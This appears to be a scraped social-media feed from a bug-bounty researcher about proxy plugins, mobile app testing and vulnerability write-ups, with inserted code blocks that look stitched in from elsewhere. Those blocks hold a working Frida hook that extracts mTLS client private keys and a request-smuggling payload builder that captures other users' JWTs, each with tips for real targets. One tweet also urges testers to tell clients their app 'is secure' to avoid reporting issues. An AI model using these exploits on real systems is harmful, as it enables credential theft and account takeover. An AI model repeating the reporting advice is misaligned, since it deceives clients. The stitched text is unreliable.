Interested in Application Security, Bug Bounty, Reverse Engineering, Frida & Ghidra @NoBugEscapes @BugBountyZip bugbounty.zip

Michigan
Blind Insecure Direct Object Reference (IDOR) On Instagram. Write-up: nobugescapes.com/blog/blind-… #bugbountytips #bugbounty #p2 #bugcrowd #meta
Replying to @Naughty_Dog
The 15th anniversary of Uncharted 2 is coming up on October 13, 2024! Any chance we'll see a multiplayer experience on PS4 or PS5? #Uncharted2 #Anniversary
Replying to @Naughty_Dog
And as part of this anniversary celebration, we are excited to bring back Uncharted 2 Multiplayer on PS5.
Replying to @Naughty_Dog
Uncharted 2 Multiplayer on PS5 & PS4. #uncharted2 #ps3
1/ 🎉 Exciting news! Introducing BugBounty.zip! A potent toolkit designed specifically for bug bounty hunters. Hosted directly on GitHub, it's accessible anytime, anywhere! 🌍🛠 (1/6)
I've just developed my first @Burp_Suite Bambdas specifically to identify OWASP Top-25 Parameters potentially vulnerable to XSS, SSRF, RCE, SQLi, LFI, and Open Redirect. For easy code access, visit GitHub: github.com/BugBountyzip/Bamb… #Bambdas #Java
Bambda @Burp_Suite script searches through Burp history for JavaScript files, extracts hidden endpoints, and outputs the discovered endpoints to a text file. The script supports three different regex modes for discovery: High, Deep, and Custom, allowing you to add your own regex. Additionally, you can highlight high-value words (e.g., debug, admin) in red within Burp history if found inside any JavaScript file. The script automatically removes duplicate results. Access the code here: github.com/BugBountyzip/Bamb… #bugbountytips #BugBounty #burpsuite #bambda #bambdas
Finally, with @hw16, we managed to bypass the @Cloudflare mTLS protection after around 5 days of work. I'd like to share a few golden tips for bug bounty hunters who might face something similar in the future. But first, here's a quick summary.

The target was a banking app with multiple security layers:
• Heavy Frida detection mechanisms
• Strong root detection
• Google SafetyNet/Play Integrity checks
• Runtime hooking detection
• APK tampering protection (crashed immediately if repackaged/modified)

At first, @fridadotre was detected and crashed the app on my device, but strangely it worked on another device even though both had the same Android version, root method, Frida server version, and architecture. After investigation, we discovered the app had anti-hooking detection that triggered when using aggressive Frida hooks on sensitive KeyStore operations.

The solution: we wrote a minimal Frida script that:
1. Passively monitored certificate operations without modifying behavior
2. Intercepted KeyManagerFactory.init(), the exact moment when mTLS certificates are loaded
3. Extracted the X.509 client certificate and RSA private key (4096-bit)
4. Encoded them using Android's Base64 encoder
5. Formatted them as PEM files ready for use

We found the mTLS certificate with a unique UUID-based alias in the Android KeyStore. The certificate was being dynamically loaded during SSL handshake initialization.

Extracted files:
• client_cert.pem → client certificate (valid for 2 years)
• client_key.pem → RSA private key (PKCS#8 format)

We then created a PKCS#12 bundle using OpenSSL to combine the certificate and key into a single file, which could be imported into various tools and browsers for testing, or into @Burp_Suite.

Key takeaway: when facing anti-tampering mechanisms, be surgical: hook only what you need, when you need it. Aggressive hooking triggers detection; passive monitoring flies under the radar.
This was an awesome challenge and my first time encountering such strong SSL pinning defenses. Attached are some images from the mobile API and the Frida output of the certificates. #bugbountytips #frida #Magisk #mtls
Did @Cloudflare just defeat @Burp_Suite and @CaidoIO? Cloudflare protection is becoming very common. This is the third app I've seen using it. Changing the user agent doesn't help, and the Burp TLS-fingerprint bypass plugin didn't work. The app blocks any request when it detects traffic interception. My target mobile app might be using a dynamic certificate, based on my friend's analysis. Back in Nov 2024, I tested a web app with Burp, but it blocked all traffic. Switching to Caido worked; maybe its signatures weren't detected at the time. Can anyone share insights? Thanks. #BugBounty
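A passive hook of the kind described in steps 1 to 5 above, written here as an added example; it is not the authors' script, which the post does not show. It assumes the app loads its client identity through KeyManagerFactory.init(KeyStore, char[]) and that the private key is exportable: PrivateKey.getEncoded() returns null for hardware-backed AndroidKeyStore keys, so that case is reported instead of dumped. The PEM helpers are plain JavaScript and work outside Frida; only the guarded block at the end touches the Java bridge.

```javascript
// Added example, not the authors' script: a passive Frida hook on
// javax.net.ssl.KeyManagerFactory.init(KeyStore, char[]) that dumps every
// key entry of the KeyStore the app hands in, as PEM. Assumptions: the app
// loads its client identity through this overload, and the private key is
// exportable (PrivateKey.getEncoded() returns null for hardware-backed
// AndroidKeyStore keys, so that case is reported rather than dumped).

// Wrap a base64 DER blob as PEM: 64-character lines between BEGIN/END markers.
function derToPem(base64Der, label) {
  const lines = base64Der.match(/.{1,64}/g) || [];
  return `-----BEGIN ${label}-----\n${lines.join("\n")}\n-----END ${label}-----\n`;
}

// Inverse of derToPem, used to sanity-check a dumped block.
function pemBody(pem, label) {
  const re = new RegExp(`-----BEGIN ${label}-----\\n([\\s\\S]*?)\\n-----END ${label}-----`);
  const m = pem.match(re);
  return m ? m[1].replace(/\n/g, "") : null;
}

// Build the PEM pair for one alias. certB64 is base64 of Certificate.getEncoded()
// (X.509 DER); keyB64 is base64 of PrivateKey.getEncoded() (PKCS#8 DER) or null.
function buildPemPair(alias, certB64, keyB64) {
  return {
    alias,
    cert: derToPem(certB64, "CERTIFICATE"),
    key: keyB64 ? derToPem(keyB64, "PRIVATE KEY") : null,
  };
}

// Frida-only part: active when loaded with `frida -U -f <package> -l dump_mtls.js`.
if (typeof Java !== "undefined") {
  Java.perform(function () {
    const KeyManagerFactory = Java.use("javax.net.ssl.KeyManagerFactory");
    const Base64 = Java.use("android.util.Base64");
    const NO_WRAP = Base64.NO_WRAP.value;
    const init = KeyManagerFactory.init.overload("java.security.KeyStore", "[C");

    const b64 = (bytes) => (bytes ? Base64.encodeToString(bytes, NO_WRAP) : null);

    init.implementation = function (keyStore, password) {
      // Let the real init run first: behaviour is unchanged, only observed.
      const result = init.call(this, keyStore, password);
      try {
        const aliases = keyStore.aliases();
        while (aliases.hasMoreElements()) {
          const alias = aliases.nextElement().toString();
          if (!keyStore.isKeyEntry(alias)) continue;
          const cert = keyStore.getCertificate(alias);
          const key = keyStore.getKey(alias, password);
          const pair = buildPemPair(alias, b64(cert.getEncoded()), b64(key ? key.getEncoded() : null));
          console.log("[mTLS] alias=" + alias);
          console.log(pair.cert);
          console.log(pair.key || "[mTLS] private key not exportable (hardware-backed?)");
        }
      } catch (e) {
        console.log("[mTLS] dump failed: " + e);
      }
      return result;
    };
  });
}
```

Let the app reach its first authenticated API call so the handshake is set up, copy the two blocks into client_cert.pem and client_key.pem, then bundle them with `openssl pkcs12 -export -in client_cert.pem -inkey client_key.pem -out client.p12` and load the .p12 under Burp's client TLS certificate settings. Because the hook calls the original init and only reads from the KeyStore afterwards, it avoids the aggressive KeyStore hooking that tripped the app's anti-hooking check.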
Someone has stolen my Instagram Username and sold it. I think they social-engineered the Meta support team to gain access, and I never got any email alerts about it. cc : @instagram @mosseri #instagram #Meta
With all these achievements, how is Uncharted 2 Multiplayer still missing on PS5?
1. VGX Award for Game of the Year (2009)
2. VGX Award for Best PS3 Game (2009)
3. BAFTA Games Award for Audio Achievement (2010)
4. Writers Guild of America Award for Achievement in Writing (2010)
5. VGX Award for Best Graphics (2009)
6. BAFTA Games Award for Story (2010)
7. BAFTA Games Award for Action Game (2010)
8. BAFTA Games Award for Original Score (2010)
9. IGN Select Award for Best Console Game (2009)
10. IGN Select Award for Best Game (2009)
11. IGN Select Award for Best Visual Design (2009)
Replying to @elonmusk
AI = Absolutely Impressive moves!
Just added a new feature to @Burp_Suite: now you can hide your screen with a privacy overlay! Easily enable or disable it by pressing F12. github.com/BugBountyzip/Bamb… #BurpSuite #BugBounty #Bambdas #Privacy
Replying to @realradec
One of the greatest games ever made. This masterpiece deserves a multiplayer revival on PlayStation 5! @PlayStation @Naughty_Dog #uncharted2
Just launched: My first @CaidoIO plugin! Here's what it offers:
• Quick access to your go-to payloads and wordlists
• Easy management of your custom word collections
• Option to create personalized buttons for specific tasks
#Bugbounty
Just extended Burp Suite beyond its traditional use by making it capable of disassembling and analyzing PlayStation 3 game ELF files with my first Bambda script, targeting the PowerISA-Altivec-64-32addr architecture! This could make Burp Suite more powerful for looking inside binaries, not just network traffic! #bugbounty #BurpSuite #PS3 #Bambdas
Replying to @realradec
Nathan Drake & Alex Mercer
I developed a Memory Scanner and Disassembler GUI tool for PlayStation 3 using the Target Manager API. I used @iMoD1998's PS3 API for TMAPI in Python and made a GUI tool. Features include memory read/write, disassembly, and patching. Written in Python, with more features to come. I was inspired by the Cheat Engine tool for game hacking and reverse engineering and wanted to create something similar. Although Net Cheat for PS3 exists, I found it unreliable due to frequent crashes. PS3 API for TMAPI and CCAPI in Python by iMod1998: github.com/iMoD1998/PS3API #PS3 #GameDev #Modding #TMAPI #ghidra #PowerPC
Looking for a bug bounty hunter for a penetration testing role. Your college degree doesn't matter; just share your bug bounty profile, research blogs, and any relevant work. DM if you're interested!
Soon, I'll be introducing a new tool on BugBounty.zip: a new vulnerability scanner based on OWASP's top 25 vulnerable parameters. It's fast, with a user-friendly interface and effortless usability. I'm confident you'll love it! Stay tuned for updates. :D #BugBounty
Hello @Burp_Suite, could you please correct the Arabic language rendering in responses? It's been nearly a year.
New in @Burp_Suite Screen Drawing! A lifesaver when triage asks for more details after you’ve walked them through the bug multiple times #bugbounty #burpsuite #bambdas github.com/BugBountyzip/Bamb…
You can now use @CaidoIO with a PlayStation 5 DualSense controller wirelessly! Mapped a few shortcuts using DS4Windows + Caido Shortcuts 🎮
X = Forward request
O = Drop request
Square = Go to Replay tab
The theme used in the video is a custom theme inspired by the PS4. #bugbounty
No borders for bug bounty hunters – use your jailbroken PlayStation 4 to run @CaidoIO, demonstrated on Linux Fedora 38. You can also switch back to the original PS4 OS or Linux anytime. #BugBounty #bugbountytips #PS4 #x86
If Burp Suite finds the bugs, Bambdas make them history! You can write Java-based Bambdas to create custom filters for your HTTP history. Explore a variety of Bambda scripts, some written by me and others shared by our community, at marketplace.bugbounty.zip/Bu… You can browse the scripts using arrow keys and quickly copy any Bambda script to your clipboard with a press of 'C'. Compatible with both Burp Suite Community Edition and Professional. We're currently optimized for desktop browsers and are working on an Electron-based desktop app for a more integrated experience. 🔧 Got a bug to report or an idea to share? Please let us know on GitHub: github.com/BugBountyzip/bugb… #bugbounty #Bambdas
Rapid-Hand! 💥 Inject a list of payloads into different parameters all at once, then export the output, encode/decode, and even open them all in a new tab. Supercharge your testing process and improve efficiency. bugbounty.zip/RapidHand.html
Replying to @NaughtyDogJobs
You don't need a writer; you can use @ChatGPTapp
@Burp_Suite Bambda Script, leveraging ChatGPT for accurate API endpoint prediction. Find the code on GitHub: github.com/BugBountyzip/Bamb… Supported by both Burp Suite Community and Pro editions #Bambdas #bugbounty
The PS3 had a special type of processor called the Cell processor, which is quite different from the x86 processor used in the PS5. This difference makes it difficult to directly emulate PS3 games on the PS5, as it requires a lot of processing power and complicated software. #ps3 #ps5
It's been 1363 days since the PS5 launched, and it still can't emulate PS3 games.
I’ve added glitch effects to @Burp_Suite Check out the code at github.com/BugBountyzip/Bamb… Toggle the effects on or off by pressing F12. #bugbounty #burpsuite #Bambdas
This is a good thread from the community about Flutter SSL pinning bypass. They have explained most of the common ways to bypass SSL pinning in Flutter apps. I want to share some points from my own experience with Flutter apps.

The tool mentioned in the thread, Refluutr, will not work in most cases. If it works for you, you are lucky. Sometimes the APK will refuse to run and crash right away because it was modified and signed with a different certificate. The developer or the SDK protection might have integrity checks to see if the app has been modified.

For Frida, there are scripts made by the community to bypass SSL pinning in Flutter apps. The problem is that many apps can detect Frida and will close immediately. You will need to patch the Frida server to avoid detection.

Another useful program I have used before is ProxyDroid, but it needs root access. #bugbountytips
Anyone have good advice on how to intercept Flutter-based mobile apps with Burp Suite?
Coming soon: @CaidoIO CaidVo PassCode! After 3 wrong attempts, Caido may lock permanently until uninstalled. Backed with memory encryption and anti-debugging. I locked mine and now have to figure out how to remove the plugin! 😝 #BugBounty #DenuVo
🫡 @CaidoIO Crawler🕷️ + Scanner in progress #BugBounty #bugbountytips #JavaScript links.caido.io/www-discord
It’s 1999 again, and your Burp Suite UI is stuck in time. Pixelated, slow, and full of nostalgia from the early days of the internet. @Burp_Suite version 1999.9.9 Bambda theme #Burpsuite #bugbounty #bambdas
Thank you Meta Security Team for the bounty @fbsecurity @Meta @instagram @Bugcrowd. More details will be shared soon on my personal blog, NoBugEscapes.com
Just created a @Burp_Suite fade in/out effect! Works in both Community & Professional editions. Stop the effect by pressing F12. To run the script, switch to Bambda mode, paste the code, and click "Apply and Close." Script here: github.com/BugBountyzip/Bamb… #BugBounty #BurpSuite #bambdas
Hope🪽 is a tool designed to scan a list of URLs and identify potentially vulnerable parameters, focusing on OWASP's top 25 vulnerable parameters. Link: bugbounty.zip/Hope.html Discover how it works.👇
I've added a new feature in @Burp_Suite using a Bambda script that shows link previews when you hover over any links. #burpsuite #bambdas #BugBounty
Replying to @briscoepark
These remind me of Red Dead Redemption 2 ❤️
New @Cloudflare beta feature detects BOLA attacks via parameter pollution (duplicate params) and enumeration (excessive ID requests). It only adds warning labels; it doesn't block attacks. Enumeration detection needs 10k+ user sessions to learn normal behavior first. New endpoints have zero detection until enough traffic. developers.cloudflare.com/ap… #bugbounty #ApplicationSecurity #WAF
These images were generated with Grok AI! #AIArt #Grok
Any chance we’ll see a CSRF Generator in @CaidoIO soon? Definitely a feature worth waiting for! 💔😮‍💨 #BugBounty
Mutual TLS (mTLS): the collaboration with @hw16 on this task is ongoing. Anti-hooking and anti-fraud SDKs have slowed us down, but we've made significant progress and gotten some secrets. cloudflare.com/en-gb/learnin… by @Cloudflare #BugBounty #frida #Magisk
Grateful to @Cloudflare 🌩️ for their outstanding bug bounty program! hackerone.com/cloudflare :) #bugbounty #hackerone
Replying to @HRHMBNSALMAAN
A leader who pushes for progress and innovation.
I’ve built a password lock screen plugin for @CaidoIO. Can you break it? DM your proof and earn a 1-month Pro Caido subscription! Project link : github.com/BugBountyzip/Caid… #bugbounty #ReverseEngineering #Debugger
CVE-2022-35646 ibm.com/support/pages/node/6… I will share technical details soon on how to reject users' requests before they reach the line manager. nobugescapes.com
Session-Based Validation Bypass via Trusted Parameter Override #bugbountytips
Session-Based Validation Bypass via Trusted Parameter Override 🔴GET /v1/user/profile/userDetails → Pulls my data based on my JWT session token. 🔴GET /v1/user/profile/userDetails?userId=victim-id → The app ignores the session and trusts the userId param, which exposes the victim's data. The logic prioritizes userId from the request over the authenticated session, leading to session confusion and broken access control. #bugbountytips #websecurity
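The access-control flaw described above, modelled as an added example (not the target's code): a vulnerable handler that lets a client-supplied userId override the authenticated subject, the fixed handler beside it, and a small helper that flags the exact probe a tester sends when hunting this bug. The user table, identifiers and the pre-verified session claims are constructed for the example; JWT signature verification is assumed to happen before these functions are called.

```javascript
// Added example, not the target's code: /v1/user/profile/userDetails modelled
// as two handlers over an in-memory user table. `session.sub` is the subject
// claim of an already-verified JWT; `query` holds the URL parameters.

const USERS = {
  "u-1001": { name: "Alice", email: "alice@example.invalid" },
  "u-2002": { name: "Bob", email: "bob@example.invalid" },
};

// Vulnerable: a client-supplied userId takes precedence over the session
// subject, so ?userId=<victim> returns the victim's record.
function userDetailsVulnerable(session, query) {
  const target = query.userId || session.sub;
  return USERS[target] || null;
}

// Fixed: the subject always comes from the session. A userId that names
// anyone else is rejected instead of silently honoured; legitimate admin
// lookups belong behind an explicit authorization check, not a fallback.
function userDetailsFixed(session, query) {
  if (query.userId !== undefined && query.userId !== session.sub) {
    return { error: "forbidden", status: 403 };
  }
  return USERS[session.sub] || null;
}

// Triage helper for proxy history: true when an identifier parameter is
// present and differs from the token's subject, i.e. the request is an
// IDOR probe worth diffing against the un-parameterised response.
function looksLikeIdorProbe(session, query, idParams = ["userId", "id", "uid"]) {
  return idParams.some((p) => query[p] !== undefined && query[p] !== session.sub);
}
```

When confirming this class of bug, send the request once without the parameter and once with another account's identifier, and compare the bodies: a 200 with different data is the finding, while a 403 (or the caller's own data) from the fixed handler shows the session, not the parameter, is authoritative.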
Replying to @realradec
Life with PlayStation: Discontinued in 2012. PlayStation Home: Shut down on March 31, 2015. We hope the PlayStation 3 lasts forever. #PlayStation #ps3
Replying to @realradec
The light that launched a thousand repair kits
You can now create different PoCs for Cross-Site Request Forgery (CSRF) attacks. I'm pleased to make this available to all! #BugBounty #bugbountytips
🛡️✨ Another addition to the Caido Store! Introducing "CSRF PoC Generator" by @Tur24Tur. Generate various types of CSRF PoC payloads from requests. Check it out: github.com/BugBountyzip/Caid…
Replying to @haxor31337
Bug bounty platforms should be responsible for adding a warning message when researchers submit a report. The message could say: "Please note that this program also has a paid private program. Email us to request an invite."
Hello Pentesters and Bug Bounty Hunters, please avoid reporting issues like "Jailbreak/root detection bypass" to app owners or during a pentesting engagement. These problems are related to the security SDK providers, not the app developers. If you report them, you are giving free help to the SDK company. If you are asked about it, you can simply say: "The current app version is secure. The issue happens only on older versions." Thank you for your understanding. #bugbountytips #BugBounty
New update for the Caido CSRF plugin! Release 1.0.4: Added HTML encoding for parameter values with double quotes. Big thanks to @stealthcopter for the contribution! #bugbounty #bugbountytips
Replying to @h4x0r_dz
Find vulnerabilities! get a certificate! (Printing costs not covered)
The app has a new look with an updated design. There's also a new JavaScript scanner: just add your JavaScript files and it will automatically find all the endpoints. More features and ideas will be added over time. bugbounty.zip/index.html# #bugbountytip #BugBounty
Complete UI redesign with modern dark/light theme support and smooth animations. #BugBounty bugbounty.zip/Patch.html
Request Smuggling Exposes JWT, Enables 0-Click Account Takeover #BugBounty #bugbountytips
How did a vulnerability let us get into anyone's account? How did @0x_itto and I discover a 🔴Request Smuggling Exposes JWT, Enables 0-Click ATO!! vulnerability that allowed us to fully take over any account without any interaction from the user! Good evening everyone. Today we'll talk about one of the fun and strange vulnerabilities we discovered while testing one of the websites. By exploiting it, we were able to reach any person's account without any interaction from them! In the name of God, let's start and tell you the full story.

# Request Smuggling?
First, what does Request Smuggling mean? Before we get into the details, we need to explain what Request Smuggling is and how it happens. We all know that a single request passes through more than one component, such as a CDN, a Load Balancer, or a Reverse Proxy. These are the Front-End Servers: in short, the servers that receive the request first, before it reaches the main server (the Back-End Server). This in itself is normal and excellent and has benefits in terms of architecture and development. But the problem starts when the Front-End and the Back-End understand/process the request in different ways, meaning the Front-End reads it one way and the Back-End interprets it another way. And here the disaster happens! Why? Because there is a misunderstanding between them, and this is exactly where the vulnerability arises, which is what we want as bug hunters (; So in short, a Request Smuggling vulnerability comes down to one thing: the incompatibility between the Front-end Servers (CDN, Proxy, Load Balancer) and the Back-end Server.

# Discovery
While testing one of the websites, after some research we managed to discover something somewhat strange: when we sent a request and played with the Content-Length and Transfer-Encoding headers, we noticed something abnormal, namely a delay in the response, and the delay was not normal. As we see in the picture, the response started to be delayed and gave us a Timeout, as you can see in the picture.
This shows that there is a difference in how the request is handled: clearly the Front-end was using Content-Length and the Back-end was using Transfer-Encoding. If you don't know what these headers do, simply put, they define the end of the Request Body, i.e. the end of the sent request. Since each server handles it differently, a conflict/confusion occurred, and the result? A Request Smuggling vulnerability, and the type here is CL.TE, meaning the Front-end relies on Content-Length and the Back-end relies on Transfer-Encoding. Because of this incompatibility between the two servers on the headers, we got the following, and with that we confirmed there really was request smuggling and finished the first and most important step. Now we move on to the harder part, which is exploitation.

# Exploiting the smuggle to smuggle (;
Now we move on to the hardest part, exploitation. As we know, exploiting Request Smuggling differs from site to site, and it doesn't always have a strong impact, but we didn't stop. We tried several scenarios, and honestly the results at first were weak. But after a lot of research and experimentation, we found something... and not just anything. The site had a function that allowed users to comment on any post. So we had an idea... what happens if we try to exploit the request smuggling on the post-comment function? We tried to smuggle into it using the same CL.TE technique. The picture shows how the exploitation happened... As you can see, we exploited request smuggling on post-comment, and the backend received the request as if it were two separate requests. The 0 represents the end of the request according to the chunked format that the backend understands. So the post-comment request was left pending in the backend, and any request that came after it would be treated as a continuation of the first request, so it merges them all as if they were one request. What's the harm, Omar? The victim's request (the one that came after us) ends up inside the comment, including the Authorization header, which contains the JWT token 🤯. In short: 0-click Account Takeover (ATO). To confirm? Look at this picture. By exploiting request smuggling, we could smuggle any request sent after ours, and so we could see the JWT token of any user who visits the site after us without them doing anything! And with the JWT token we can fully access the user's account without any interaction from them!
And with that we've reached the end of the article. I hope you enjoyed it! Wait for the next article 🔥
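The CL.TE desync from the writeup above, as an added example rather than the authors' payload: two toy parsers that split the same byte stream the way the front end (Content-Length) and the back end (Transfer-Encoding: chunked) did, which shows why the smuggled POST /post-comment is left waiting for a body and then swallows the next user's request, Authorization header included. The attacker and victim requests, the hostname and the JWT are all constructed for the example.

```javascript
// Added example, not the authors' exploit: a CL.TE desync modelled with two
// small request splitters. All requests below are constructed; the JWT is fake.
const CRLF = "\r\n";

// Parse one request head starting at `start`; null if the head is incomplete.
function parseHead(buf, start) {
  const end = buf.indexOf(CRLF + CRLF, start);
  if (end < 0) return null;
  const lines = buf.slice(start, end).split(CRLF);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { requestLine: lines[0], headers, bodyStart: end + 4 };
}

// Front end (CDN / proxy): delimits every request by Content-Length only.
function frontEndSplit(buf) {
  const reqs = [];
  let pos = 0;
  while (pos < buf.length) {
    const h = parseHead(buf, pos);
    if (!h) break;
    const cl = parseInt(h.headers["content-length"] || "0", 10);
    reqs.push({ requestLine: h.requestLine, body: buf.slice(h.bodyStart, h.bodyStart + cl),
                complete: buf.length - h.bodyStart >= cl });
    pos = h.bodyStart + cl;
  }
  return reqs;
}

// Back end (origin): honours Transfer-Encoding: chunked when present, otherwise
// Content-Length. A request whose body has not fully arrived gets complete: false.
function backEndSplit(buf) {
  const reqs = [];
  let pos = 0;
  while (pos < buf.length) {
    const h = parseHead(buf, pos);
    if (!h) break;
    let body = "", p = h.bodyStart, complete = true;
    if ((h.headers["transfer-encoding"] || "").toLowerCase() === "chunked") {
      for (;;) {
        const lineEnd = buf.indexOf(CRLF, p);
        const size = lineEnd < 0 ? NaN : parseInt(buf.slice(p, lineEnd), 16);
        if (Number.isNaN(size)) { complete = false; p = buf.length; break; }
        if (size === 0) { p = lineEnd + 4; break; }            // "0\r\n\r\n" ends the body
        body += buf.slice(lineEnd + 2, lineEnd + 2 + size);
        p = lineEnd + 2 + size + 2;                              // chunk data + trailing CRLF
      }
    } else {
      const cl = parseInt(h.headers["content-length"] || "0", 10);
      body = buf.slice(h.bodyStart, h.bodyStart + cl);
      complete = buf.length - h.bodyStart >= cl;
      p = h.bodyStart + cl;
    }
    reqs.push({ requestLine: h.requestLine, body, complete });
    pos = p;
  }
  return reqs;
}

// Attacker request: the front end sees ONE request (Content-Length covers all of
// it); the back end ends the chunked body at "0\r\n\r\n" and reads the rest as a
// NEW POST /post-comment whose declared 120-byte body so far holds only "comment=".
const SMUGGLED =
  "POST /post-comment HTTP/1.1" + CRLF +
  "Host: target.example" + CRLF +
  "Content-Type: application/x-www-form-urlencoded" + CRLF +
  "Content-Length: 120" + CRLF + CRLF +
  "comment=";
const ATTACK_BODY = "0" + CRLF + CRLF + SMUGGLED;
const ATTACK =
  "POST /post HTTP/1.1" + CRLF +
  "Host: target.example" + CRLF +
  "Content-Length: " + ATTACK_BODY.length + CRLF +
  "Transfer-Encoding: chunked" + CRLF + CRLF +
  ATTACK_BODY;

// Victim request that arrives next on the same back-end connection (fake JWT).
const VICTIM_JWT = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ2aWN0aW0ifQ.sig";
const VICTIM =
  "GET /feed HTTP/1.1" + CRLF +
  "Host: target.example" + CRLF +
  "Authorization: Bearer " + VICTIM_JWT + CRLF +
  "Cookie: a=b" + CRLF + CRLF;

function extractBearer(text) {
  const m = text.match(/Authorization:\s*Bearer\s+([A-Za-z0-9_.-]+)/);
  return m ? m[1] : null;
}

// The comment body the back end stores once the victim's bytes complete the
// pending request: it begins with "comment=" and contains the victim's headers.
function smuggledComment() {
  const reqs = backEndSplit(ATTACK + VICTIM);
  const comment = reqs.find((r) => r.requestLine.startsWith("POST /post-comment"));
  return comment && comment.complete ? comment.body : null;
}
```

The Content-Length of the smuggled request is the knob: too small and the comment cuts off before the Authorization header, too large and the back end keeps waiting for bytes that never come (the timeout the writeup used as its initial signal). On a real target, confirm the desync with a timing probe first, then size the smuggled Content-Length to just cover the headers you want captured.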
Thanks @Bugcrowd for the challenge coins. #BugBounty #bugcrowd #P1
I've maintained the #1 rank on the official repository since the launch of @Burp_Suite Bambdas, with my first pull request submitted on December 4, 2023. Take a look at some scripts I've created: github.com/PortSwigger/bambd… #bugbounty #Bambdas #Burpsuite
Did you know, with the new Bambda Library, you can save your favorite Bambdas? 💾 #BurpTopTip #BambdaLibrary #extensibility
My target mobile app had VPN detection, which I bypassed. Then I used @HttpToolkit, which acts like a VPN, but all traffic was still blocked
First, attempt to exploit the vulnerability manually, beginning with a UNION-based attack. Since this is an Oracle database, remember to specify a table in your SELECT statement. For a quick proof of concept, you can use the built-in table called "dual."
My first plugin is live on @CaidoIO store! Great tool for anyone who wants to draw on their screenshots. Shows how powerful Caido plugins can be! #bugbounty #bugbountytips
🖍️✨ Another addition to the Caido Store! Introducing "Screen Drawing" by @Tur24Tur. Transform your cursor into a drawing pen and easily annotate Caido to improve your screenshots for reports. Check it out: github.com/BugBountyzip/Caid…
You can now add your TV to your red teaming tool kit for the next engagement. Access @CaidoIO proxy history through its GraphQL APIs on your TV. Resources Caido GraphQL: docs.caido.io/concepts/inter… Internal Network Access: docs.caido.io/reference/conf… #bugbounty #Sony #bravia
1k ♥️ A huge thanks to all of you Looking forward to sharing more thoughts, ideas, and conversations with this amazing community. #bugbounty
Replying to @CaidoIO
I’ve worked on several plugins, some completed and some still in development. How can I go about sharing them on the store? I have ported some plugins from bugbounty.zip
Evidence • Screen Recorder Don't let a single bug escape unnoticed, Evidence is your reliable ally, capturing bugs as they happen. bugbounty.zip/Evidence.html #BugBounty #bugbountytips #BugBountyzip
Next, I'll be testing these @fridadotre scripts on other apps that might use similar technologies and sharing them on the Frida community page. I want to confirm that my solution works across different apps, not just my target. Honestly, I hope I don't encounter this type of defense again. Ideally, proxy tools like @Burp_Suite and @CaidoIO should automate the process or provide a built-in solution so that bug bounty hunters can spend more time testing the target itself rather than fighting with the setup. It would also be great if the community could come up with a similar solution that doesn't rely on Frida but still allows us to extract the certificates effectively.
I've also developed a similar tool in JavaScript, available at Bug Bounty Zip. You can use it at: bugbounty.zip/Hope.html #BugBounty References: OWASP TOP 25 Parameters owasp.org/www-project-top-25… Bambdas - the next big thing in customization portswigger.net/burp/pro/fea…
Duplicate
I used to support @deepseek_ai, but not anymore. They lack the resources to handle a large user base, and every request is met with "Server is busy." I’ll give them two weeks to improve if nothing changes, I’ll either resubscribe to @ChatGPTapp or subscribe to @AnthropicAI so I have two Sonnet 3.5 accounts. #Ai #DeepSeek #ChatGPT
QuickSSRF
🚀 New plugin in the Caido Store! Introducing "QuickSSRF" by w2xim3. Perform out-of-band testing with interactsh to detect vulnerabilities like blind SSRF. Check it out: github.com/caido-community/q…
If the domain is within the defined scope, the bug should be accepted. If it’s a test environment, it should be hosted on the internal development network rather than being publicly accessible.
Seeing alphanumeric OTPs on @instagram now. Did @Meta make the switch after a reported but undisclosed account takeover vulnerability? "TDCXGHDTJ is your Instagram code. Don't share it. SSDRxcfdryn" #AppSec #InfoSec
Replying to @realradec
They should invest that money in developing and reviving the online multiplayer for classic PS3 games like Uncharted 2, Uncharted 3, and others, and bring them to the PS5. I believe that long-time players miss those days, and new players are excited to experience the nostalgic moments they never had the chance to enjoy.
Scenario to consider: if a bug bounty program has this feature enabled and you find an IDOR vulnerability, you might face this situation. You report it within 10 minutes of discovery, but @Cloudflare BOLA detection has already alerted their team. They investigate and patch it immediately. When triage tries to reproduce your bug the next day, it's already fixed and your report gets marked as "Not Applicable" despite finding a valid vulnerability. Document everything: video recordings, screenshots, request/response captures. Without proof, your valid finding becomes "not reproducible."
Replying to @cs @Meta @instagram
Hey Adam Mosseri @mosseri Please look into this case. How can someone's username be swapped to another person? Review the support tickets and examine how this request was handled. This requires your investigation.
I spent a few days reverse engineering one of the Android shield solutions that provides root detection. I also analyzed it dynamically using @fridadotre 🔥. Most of the detection logic was encrypted and only decrypted at runtime when the app starts. Here are some common detection methods I found; I have organized them with the help of AI for better clarity.

## Root Detection Checks
- /data/local/su
- /data/local/bin/su
- /data/local/xbin/su
- /sbin/su
- /su/bin/su
- /system/bin/su
- /system/bin/.ext/su
- /system/bin/failsafe/su
- /system/sd/xbin/su
- /system/usr/we-need-root/su
- /system/xbin/su
- /cache/su
- /data/su
- /dev/su
- /xbin/su

## Busybox Detection Checks
Checks for busybox in:
- /data/local/busybox
- /data/local/bin/busybox
- /data/local/xbin/busybox
- /sbin/busybox
- /su/bin/busybox
- /system/bin/busybox
- /system/bin/.ext/busybox
- /system/bin/failsafe/busybox
- /system/sd/xbin/busybox
- /system/usr/we-need-root/busybox
- /system/xbin/busybox
- /cache/busybox
- /data/busybox
- /dev/busybox
- /xbin/busybox

## Magisk Detection Checks
Checks for magisk in:
- /data/local/magisk
- /data/local/bin/magisk
- /data/local/xbin/magisk
- /sbin/magisk
- /su/bin/magisk
- /system/bin/magisk
- /system/bin/.ext/magisk
- /system/bin/failsafe/magisk
- /system/sd/xbin/magisk
- /system/usr/we-need-root/magisk
- /system/xbin/magisk
- /cache/magisk
- /data/magisk
- /dev/magisk
- /xbin/magisk
- /metadata/magisk/zygisk_lsposed

## Emulator Checks
- /mnt/windows/BstSharedFolder
- Reads CPU information from /proc/cpuinfo
- Reads CPU frequency from all CPU cores:
  - /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq
  - /sys/devices/system/cpu/cpu1/cpufreq/scaling_cur_freq
  - (etc. for all 8 CPU cores)
- Checks system properties like ro.boot.debug_level and ro.build.characteristics

## Xposed/Modification Checks
- /system/framework/XposedBridge.jar
- Reads process memory maps from /proc/9296/maps

## System Commands
Executes:
- getprop - to get system properties
- mount - to check mount points
